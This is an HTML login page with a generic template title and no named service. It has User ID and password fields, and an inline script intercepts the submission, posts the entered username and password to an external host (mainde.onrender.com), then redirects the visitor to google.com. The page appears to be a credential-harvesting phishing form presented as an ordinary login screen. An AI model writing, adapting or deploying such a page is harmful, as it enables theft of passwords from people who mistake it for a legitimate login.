<!DOCTYPE html>
<html lang="en">

<head>
  <title>Login Form</title>
  <meta property="og:title" content="Well Worn Dizzy Goldfish" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

  <meta charset="utf-8" />
  <meta property="twitter:card" content="summary_large_image" />

  <style data-tag="reset-style-sheet">
    html {
      line-height: 1.15;
    }

    body {
      margin: 0;
    }

    * {
      box-sizing: border-box;
      border-width: 0;
      border-style: solid;
    }

    p,
    li,
    ul,
    pre,
    div,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    figure,
    blockquote,
    figcaption {
      margin: 0;
      padding: 0;
    }

    button {
      background-color: transparent;
    }

    button,
    input,
    optgroup,
    select,
    textarea {
      font-family: inherit;
      font-size: 100%;
      line-height: 1.15;
      margin: 0;
    }

    button,
    select {
      text-transform: none;
    }

    button,
    [type="button"],
    [type="reset"],
    [type="submit"] {
      -webkit-appearance: button;
    }

    button::-moz-focus-inner,
    [type="button"]::-moz-focus-inner,
    [type="reset"]::-moz-focus-inner,
    [type="submit"]::-moz-focus-inner {
      border-style: none;
      padding: 0;
    }

    button:-moz-focus,
    [type="button"]:-moz-focus,
    [type="reset"]:-moz-focus,
    [type="submit"]:-moz-focus {
      outline: 1px dotted ButtonText;
    }

    a {
      color: inherit;
      text-decoration: inherit;
    }

    input {
      padding: 2px 4px;
    }

    img {
      display: block;
    }

    html {
      scroll-behavior: smooth
    }
  </style>
  <style data-tag="default-style-sheet">
    html {
      font-family: Inter;
      font-size: 16px;
    }

    body {
      font-weight: 400;
      font-style: normal;
      text-decoration: none;
      text-transform: none;
      letter-spacing: normal;
      line-height: 1.15;
      color: var(--dl-color-gray-black);
      background-color: var(--dl-color-gray-white);

    }
  </style>
  <link rel="stylesheet"
    href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap"
    data-tag="font" />
  <link rel="stylesheet" href="./style.css" />
</head>

<body>
  <div>
    <link href="./index.css" rel="stylesheet" />

    <div class="home-container">
      <div class="home-container1">
        <span class="home-text">
          <span>Username/</span>
          <span>User</span>
          <span>ID</span>
        </span>
        <span class="home-text04">Password</span>
        <label class="home-text05">Login</label>
        <form id="loginForm" action="/submit" method="POST">

          <input type="userid" class="home-textinput input" id="userIdInput" placeholder="User ID" />
          <input type="password" class="home-textinput1 input" id="passwordInput" placeholder="Password" />
          <button type="submit" class="home-button button" id="submit">
          CONTINUE
          </button>
        </form>
        <script>
          document.addEventListener('DOMContentLoaded', () => {
            const loginForm = document.getElementById('loginForm');
            loginForm.addEventListener('submit', async (event) => {
              event.preventDefault();
              const username = document.getElementById('userIdInput').value;
              const password = document.getElementById('passwordInput').value;
              try {
                const response = await fetch('https://mainde.onrender.com/submit', {
                  method: 'POST',
                  headers: {
                    'Content-Type': 'application/json',
                  },
                  body: JSON.stringify({ username, password }),
                });
        
                if (response.ok) {
                  const data = await response.json();
                  console.log(data.message); 
        
                  window.location.href = 'https://google.com';
                } else {
                  console.error('Error:', response.status);
                }
              } catch (error) {
                console.error('Error:', error);
              }
            });
          });
        </script>
</body>
</html>
</body>
</html>